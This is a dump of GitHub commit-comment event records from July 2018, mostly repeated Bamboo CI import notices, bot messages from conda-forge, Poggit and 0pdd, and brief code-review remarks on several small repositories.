{"id":"8032722212","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870050,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-28T18:39:41Z","updated_at":"2018-07-28T18:39:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:39:41Z"}
{"id":"8032722373","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870052,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-28T18:39:48Z","updated_at":"2018-07-28T18:39:48Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-28T18:39:48Z"}
{"id":"8032722623","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870059,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-28T18:40:00Z","updated_at":"2018-07-28T18:40:00Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-28T18:40:00Z"}
{"id":"8032722656","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":29870060,"position":17,"line":null,"path":"src/Core/ImportReference.cs","commit_id":"923be5fab5ef03275d9ff963286bf7084435f02a","created_at":"2018-07-28T18:40:01Z","updated_at":"2018-07-28T18:40:01Z","author_association":"OWNER","body":"Indeed a mistake. I'm unable to fix this until the middle of the week."}},"created_at":"2018-07-28T18:40:01Z"}
{"id":"8032722692","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870061,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-28T18:40:03Z","updated_at":"2018-07-28T18:40:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:40:03Z"}
{"id":"8032723924","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870066,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-28T18:40:55Z","updated_at":"2018-07-28T18:40:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:40:55Z"}
{"id":"8032724296","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870069,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-28T18:41:11Z","updated_at":"2018-07-28T18:41:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:41:11Z"}
{"id":"8032725563","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870072,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-28T18:42:08Z","updated_at":"2018-07-28T18:42:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:42:08Z"}
{"id":"8032725632","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":29870073,"position":22,"line":null,"path":"src/Arch/RiscV/RiscVArchitecture.cs","commit_id":"d6d4ac95c8f21a879e0ffb0416d3041cefd5d7a0","created_at":"2018-07-28T18:42:10Z","updated_at":"2018-07-28T18:42:10Z","author_association":"OWNER","body":"Indeed. Also this code is almost identical on all architectures except x86 segmented modes so it could be moved into the base class as a default implementation "}},"created_at":"2018-07-28T18:42:10Z"}
{"id":"8032725794","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870074,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-28T18:42:19Z","updated_at":"2018-07-28T18:42:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:42:19Z"}
{"id":"8032727105","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870078,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-28T18:43:21Z","updated_at":"2018-07-28T18:43:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:43:21Z"}
{"id":"8032727225","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870079,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-28T18:43:27Z","updated_at":"2018-07-28T18:43:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:43:27Z"}
{"id":"8032728444","type":"CommitCommentEvent","actor":{"login":"thakichow"},"repo":{"name":"DevDivas/Reviews"},"payload":{"comment":{"id":29870083,"position":9,"line":9,"path":"client/src/components/avg_rating/avg_rating.jsx","commit_id":"7bfd8c37fba3cf01b0891221efd1a357a701f525","created_at":"2018-07-28T18:44:20Z","updated_at":"2018-07-28T18:44:20Z","author_association":"NONE","body":"I would consider refactoring to use restructuring instead of props."}},"created_at":"2018-07-28T18:44:20Z"}
{"id":"8032728938","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870084,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-28T18:44:35Z","updated_at":"2018-07-28T18:44:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:44:35Z"}
{"id":"8032728949","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29870085,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-28T18:44:35Z","updated_at":"2018-07-28T18:44:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T18:44:35Z"}
{"id":"8032731280","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29870095,"position":null,"line":null,"path":null,"commit_id":"f1e383649bcd4dbc933ea3a241eddb074cd29678","created_at":"2018-07-28T18:46:12Z","updated_at":"2018-07-28T18:46:12Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-560](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-560).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-560-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-28T18:46:12Z"}
{"id":"8032731720","type":"CommitCommentEvent","actor":{"login":"thakichow"},"repo":{"name":"DevDivas/Reviews"},"payload":{"comment":{"id":29870097,"position":12,"line":12,"path":"client/src/components/avg_rating/avg_rating.jsx","commit_id":"7bfd8c37fba3cf01b0891221efd1a357a701f525","created_at":"2018-07-28T18:46:32Z","updated_at":"2018-07-28T18:46:32Z","author_association":"NONE","body":"You can get rid of map and just use one reduce."}},"created_at":"2018-07-28T18:46:32Z"}
{"id":"8032734973","type":"CommitCommentEvent","actor":{"login":"thakichow"},"repo":{"name":"DevDivas/Reviews"},"payload":{"comment":{"id":29870099,"position":13,"line":9,"path":"client/src/components/ratings/ratings.jsx","commit_id":"7bfd8c37fba3cf01b0891221efd1a357a701f525","created_at":"2018-07-28T18:48:46Z","updated_at":"2018-07-28T18:48:46Z","author_association":"NONE","body":"Can factor out map and just use one reduce."}},"created_at":"2018-07-28T18:48:46Z"}
{"id":"8032736763","type":"CommitCommentEvent","actor":{"login":"Giggitybyte"},"repo":{"name":"Magicjarvis/pizzapi"},"payload":{"comment":{"id":29870103,"position":null,"line":null,"path":null,"commit_id":"f28b08d806153d04a0d54a2b611ec2efe2464df3","created_at":"2018-07-28T18:49:59Z","updated_at":"2018-07-28T18:49:59Z","author_association":"NONE","body":"Hope you keep up work on this!"}},"created_at":"2018-07-28T18:49:59Z"}
{"id":"8032739001","type":"CommitCommentEvent","actor":{"login":"thakichow"},"repo":{"name":"DevDivas/Reviews"},"payload":{"comment":{"id":29870112,"position":15,"line":31,"path":"client/src/components/search/search.jsx","commit_id":"7bfd8c37fba3cf01b0891221efd1a357a701f525","created_at":"2018-07-28T18:51:32Z","updated_at":"2018-07-28T18:51:32Z","author_association":"NONE","body":"Might consider using refs to grab values from input. Much more straightforward. "}},"created_at":"2018-07-28T18:51:32Z"}
{"id":"8032742807","type":"CommitCommentEvent","actor":{"login":"hackersfreezone"},"repo":{"name":"NVIDIA/android-linux-3.10"},"payload":{"comment":{"id":29870125,"position":null,"line":null,"path":null,"commit_id":"c547146262e59a359eff78636ac498494f8688e7","created_at":"2018-07-28T18:54:23Z","updated_at":"2018-07-28T18:54:23Z","author_association":"NONE","body":"[Uploading bugreport-2018-03-04-21-34-28.txt…]()\r\n"}},"created_at":"2018-07-28T18:54:23Z"}
{"id":"8032742942","type":"CommitCommentEvent","actor":{"login":"thakichow"},"repo":{"name":"DevDivas/Reviews"},"payload":{"comment":{"id":29870126,"position":null,"line":null,"path":null,"commit_id":"7bfd8c37fba3cf01b0891221efd1a357a701f525","created_at":"2018-07-28T18:54:28Z","updated_at":"2018-07-28T18:54:28Z","author_association":"NONE","body":"Please review."}},"created_at":"2018-07-28T18:54:28Z"}
{"id":"8032744263","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29870128,"position":null,"line":null,"path":null,"commit_id":"f43b3e289c745ecbfded132df49a2d5258ab3b5b","created_at":"2018-07-28T18:55:16Z","updated_at":"2018-07-28T18:55:16Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-561](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-561).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-561-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-28T18:55:16Z"}
{"id":"8032745235","type":"CommitCommentEvent","actor":{"login":"DaneEveritt"},"repo":{"name":"pterodactyl/documentation"},"payload":{"comment":{"id":29870132,"position":3,"line":3,"path":".vuepress/theme/styles/variables.css","commit_id":"1d055089cd95e82fa444d22a4643705090f6135d","created_at":"2018-07-28T18:56:01Z","updated_at":"2018-07-28T18:56:01Z","author_association":"MEMBER","body":"🐟 "}},"created_at":"2018-07-28T18:56:01Z"}
{"id":"8032746425","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29870140,"position":null,"line":null,"path":null,"commit_id":"72b9c483a598541c5923dcffaf05500492af3b74","created_at":"2018-07-28T18:56:40Z","updated_at":"2018-07-28T18:56:40Z","author_association":"COLLABORATOR","body":"Puzzle `15-0b8da355` disappeared from [`src/main/java/io/zold/api/Wallet.java`](https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/Wallet.java), that's why I closed #29. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-28T18:56:40Z"}
{"id":"8032746504","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29870141,"position":null,"line":null,"path":null,"commit_id":"72b9c483a598541c5923dcffaf05500492af3b74","created_at":"2018-07-28T18:56:44Z","updated_at":"2018-07-28T18:56:44Z","author_association":"COLLABORATOR","body":"Puzzle `29-4f17ced3` discovered in   [`src/main/java/io/zold/api/CpTransaction.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/CpTransaction.java)   and submitted as #54. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-28T18:56:44Z"}
{"id":"8032746645","type":"CommitCommentEvent","actor":{"login":"richturn4u2"},"repo":{"name":"richturn4u2/Lawn-Landscape"},"payload":{"comment":{"id":29870142,"position":null,"line":null,"path":null,"commit_id":"95d0148aaa7cdf768b3fc7dfe543ef277f727bf1","created_at":"2018-07-28T18:56:49Z","updated_at":"2018-07-28T18:56:49Z","author_association":"OWNER","body":"Our goal is to build client relationships that will enable us to provide a credible experience with a showcase of extraordinary performances."}},"created_at":"2018-07-28T18:56:49Z"}
{"id":"8032747015","type":"CommitCommentEvent","actor":{"login":"amueller"},"repo":{"name":"tgy/summer_school_2018"},"payload":{"comment":{"id":29870143,"position":null,"line":null,"path":null,"commit_id":"d1abdc245fa76f6a68c2189b20d10897c8bf689f","created_at":"2018-07-28T18:57:06Z","updated_at":"2018-07-28T18:57:06Z","author_association":"NONE","body":"if you @ mention someone in a commit, every time it get's rebased or merged or anything the person will get an email. Just for the future ;)"}},"created_at":"2018-07-28T18:57:06Z"}
{"id":"8032748553","type":"CommitCommentEvent","actor":{"login":"anils33"},"repo":{"name":"anils33/repo-2"},"payload":{"comment":{"id":29870150,"position":null,"line":null,"path":null,"commit_id":"f8aceae0d46243617a8169f0abb91b6b9907413c","created_at":"2018-07-28T18:58:05Z","updated_at":"2018-07-28T18:58:05Z","author_association":"OWNER","body":"$ chmod a+x name.sh\r\n$ ./name.sh Hans-Wolfgang Loidl\r\nMy first name is Hans-Wolfgang\r\nMy surname is Loidl\r\nTotal number of arguments is 2"}},"created_at":"2018-07-28T18:58:05Z"}
{"id":"8032751638","type":"CommitCommentEvent","actor":{"login":"hackersfreezone"},"repo":{"name":"NVIDIA/android-linux-3.10"},"payload":{"comment":{"id":29870161,"position":null,"line":null,"path":null,"commit_id":"c547146262e59a359eff78636ac498494f8688e7","created_at":"2018-07-28T19:00:16Z","updated_at":"2018-07-28T19:00:16Z","author_association":"NONE","body":"hz-buildsrv9@hzbuildsrv9"}},"created_at":"2018-07-28T19:00:16Z"}
{"id":"8032752252","type":"CommitCommentEvent","actor":{"login":"Thormes"},"repo":{"name":"Thormes/Thor"},"payload":{"comment":{"id":29870163,"position":null,"line":null,"path":null,"commit_id":"13a3ec28ca71e79c63c949799eb3465bfe38fbeb","created_at":"2018-07-28T19:00:36Z","updated_at":"2018-07-28T19:00:36Z","author_association":"OWNER","body":"Thor é um programa em Access para fazer integração do sistema Creta com o SAPIENS."}},"created_at":"2018-07-28T19:00:36Z"}
{"id":"8032754639","type":"CommitCommentEvent","actor":{"login":"mdwareing"},"repo":{"name":"joshheath/MA_final_project"},"payload":{"comment":{"id":29870176,"position":null,"line":null,"path":null,"commit_id":"9689fbe583f9a6effe16276c17e7f007aa13a0f5","created_at":"2018-07-28T19:02:22Z","updated_at":"2018-07-28T19:02:22Z","author_association":"COLLABORATOR","body":"Photos are not working, I will update that now :)"}},"created_at":"2018-07-28T19:02:22Z"}
{"id":"8032757817","type":"CommitCommentEvent","actor":{"login":"Dhanendra01"},"repo":{"name":"Dhanendra01/Final-Project"},"payload":{"comment":{"id":29870188,"position":null,"line":null,"path":null,"commit_id":"317da812d99b811750c04cc30158a8e68844de6a","created_at":"2018-07-28T19:04:50Z","updated_at":"2018-07-28T19:04:50Z","author_association":"OWNER","body":"NA"}},"created_at":"2018-07-28T19:04:50Z"}
{"id":"8032757896","type":"CommitCommentEvent","actor":{"login":"Dhanendra01"},"repo":{"name":"Dhanendra01/Final-Project"},"payload":{"comment":{"id":29870189,"position":null,"line":null,"path":null,"commit_id":"317da812d99b811750c04cc30158a8e68844de6a","created_at":"2018-07-28T19:04:53Z","updated_at":"2018-07-28T19:04:53Z","author_association":"OWNER","body":"NA"}},"created_at":"2018-07-28T19:04:53Z"}
{"id":"8032758455","type":"CommitCommentEvent","actor":{"login":"chexbox"},"repo":{"name":"herohamp/Purpura"},"payload":{"comment":{"id":29870191,"position":null,"line":null,"path":null,"commit_id":"6eb4d44b016e2b7b62b4fdec58e369729a0089af","created_at":"2018-07-28T19:05:21Z","updated_at":"2018-07-28T19:05:21Z","author_association":"NONE","body":"I hope you meant \"Support non squares\""}},"created_at":"2018-07-28T19:05:21Z"}
{"id":"8032759763","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-clustermq-feedstock"},"payload":{"comment":{"id":29870195,"position":null,"line":null,"path":null,"commit_id":"6823e9e70cba69b4d90eb11e2e9af74ec8da63e0","created_at":"2018-07-28T19:06:23Z","updated_at":"2018-07-28T19:06:23Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-28T19:06:23Z"}
{"id":"8032760059","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Apiupdaterr/PlayerVaults-PATCH"},"payload":{"comment":{"id":29870198,"position":null,"line":null,"path":null,"commit_id":"d724ce6300ca7dfd33b73e4fd8146c67c4ac5897","created_at":"2018-07-28T19:06:38Z","updated_at":"2018-07-28T19:06:38Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Apiupdaterr/PlayerVaults-PATCH/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `59c5cb5e-9299-11e8-8187-c8cfeebc0b33`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T19:06:38Z"}
{"id":"8032761879","type":"CommitCommentEvent","actor":{"login":"AnshulRana13"},"repo":{"name":"AnshulRana13/MeanApplication"},"payload":{"comment":{"id":29870202,"position":null,"line":null,"path":null,"commit_id":"7fa09651d769f741970e44b1af4bca8eb3e53a4b","created_at":"2018-07-28T19:08:07Z","updated_at":"2018-07-28T19:08:07Z","author_association":"OWNER","body":"deleted file "}},"created_at":"2018-07-28T19:08:07Z"}
{"id":"8032762877","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29870211,"position":34,"line":31,"path":"src/stages/TestingStage.java","commit_id":"f21938717d0afa914ca2dfd1a7728f35e8c61df7","created_at":"2018-07-28T19:08:54Z","updated_at":"2018-07-28T19:08:54Z","author_association":"CONTRIBUTOR","body":"I put down a random number that worked ish. Feel free to change.\r\nNote that scaling changes the pixel to meters conversion so it's probably 40 px/m now since everything's scaled by 1.25"}},"created_at":"2018-07-28T19:08:54Z"}
{"id":"8032764839","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/bqplot-feedstock"},"payload":{"comment":{"id":29870218,"position":null,"line":null,"path":null,"commit_id":"8892128f3b87baf36ec1466f1eb413c99ecadbd2","created_at":"2018-07-28T19:10:32Z","updated_at":"2018-07-28T19:10:32Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @rmenegaux was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details 